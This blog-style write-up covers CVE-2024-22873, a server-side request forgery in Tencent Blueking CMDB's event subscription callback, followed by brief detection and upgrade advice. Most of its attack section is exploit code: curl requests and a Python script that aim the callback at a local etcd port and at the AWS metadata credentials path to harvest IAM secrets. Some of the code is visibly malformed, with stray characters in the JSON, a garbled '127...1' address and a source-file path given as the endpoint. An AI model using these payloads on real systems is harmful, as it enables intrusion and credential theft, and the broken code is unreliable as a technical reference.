Author's Note:
This write-up is exclusive and aims to provide a deep dive into CVE-2024-22873, an SSRF vulnerability impacting Tencent Blueking CMDB. Here, we'll break down the bug, demonstrate how it works, and give you code examples to understand the risk better. *This is for educational purposes only—do not use this information maliciously*.
What is CVE-2024-22873?
CVE-2024-22873 is a Server-Side Request Forgery bug in Tencent Blueking CMDB, affecting versions from v3.2.x up to v3.9.x. It takes advantage of the *event subscription* feature, specifically the endpoint /service/subscription.go. By sending a carefully crafted POST request, a malicious actor can force the server to make HTTP requests to internal systems, cloud metadata endpoints, and other protected resources.
Why SSRF is Dangerous
Server-Side Request Forgery lets attackers manipulate the server to send arbitrary HTTP requests, which could lead to:
- Accessing internal-only APIs/services
Accessing instance metadata and secrets
Tencent CMDB is widely deployed for managing infrastructure, making this SSRF potentially devastating.
How the Vulnerability Works
The problem lies in how CMDB handles event subscription requests. When a subscription is created or updated (via /service/subscription.go), the URL provided by the user isn't correctly sanitized or validated, allowing an attacker to supply any URL—including ones pointing to internal addresses.
Here’s a simplified POST request (in curl) that sends a crafted payload
curl -X POST http://victim-cmdb.example.com/service/subscription.go \
-H "Content-Type: application/json" \
-d '{
"operation": "create",
"callback": "http://127...1:2379/v2/keys/";,
"event_type": "host",
"name": "ssrf-exploit"
}'
What happens?
The server tries to verify or interact with the callback URL you’ve provided—making a server-side request to 127...1:2379, which is typically a local etcd management port. Imagine what you could access if there were sensitive services running locally or in the internal network!
For cloud environments, swap the callback to fetch cloud credentials
# AWS Example
curl -X POST http://victim-cmdb.example.com/service/subscription.go \
-H "Content-Type: application/json" \
-d '{
"operation": "create",
"callback": "http://169.254.169.254/latest/meta-data/iam/security-credentials/";,
"event_type": "host",
"name": "ssrf-pwn"
}'
This can lead to exposure of secrets like AWS IAM credentials!
Hands-On Exploit Demonstration
Below you'll find a Python script that demonstrates this SSRF exploit. It attempts to access the AWS metadata service from inside a vulnerable Blueking CMDB environment:
import requests
import json
target_url = 'http://victim-cmdb.example.com/service/subscription.go'
ssrf_payload = {
"operation": "create",
"callback": "http://169.254.169.254/latest/meta-data/iam/security-credentials/";,
"event_type": "host",
"name": "ssrf-pwn"
}
headers = {'Content-Type': 'application/json'}
response = requests.post(target_url, headers=headers, data=json.dumps(ssrf_payload))
print("SSRF Exploit Response:\n", response.text)
Note: You won’t get the internal response directly unless the application reflects it, but you can use timing attacks or side-channels to confirm whether a connection is made, or escalate by chaining with another bug.
Detection and Mitigation
- Detection: Monitor for suspicious outbound requests from the CMDB host, especially those targeting unusual IPs (127...1, 169.254.169.254, RFC1918 ranges).
Mitigation:
- Upgrade to patched versions of Blueking CMDB (see Blueking security updates).
More References
- Official CVE notice
- Blueking CMDB GitHub - Security Notices
- Common SSRF Exploitation Techniques (PortSwigger)
Final Thoughts
CVE-2024-22873 is the latest reminder that SSRF is a critical and often underestimated risk in modern infrastructure products. If you use Tencent Blueking CMDB—update now and audit any similar callback features. Secure those internal resources, and stay vigilant.
Timeline
Published on: 02/26/2024 16:27:56 UTC
Last modified on: 08/05/2024 21:35:03 UTC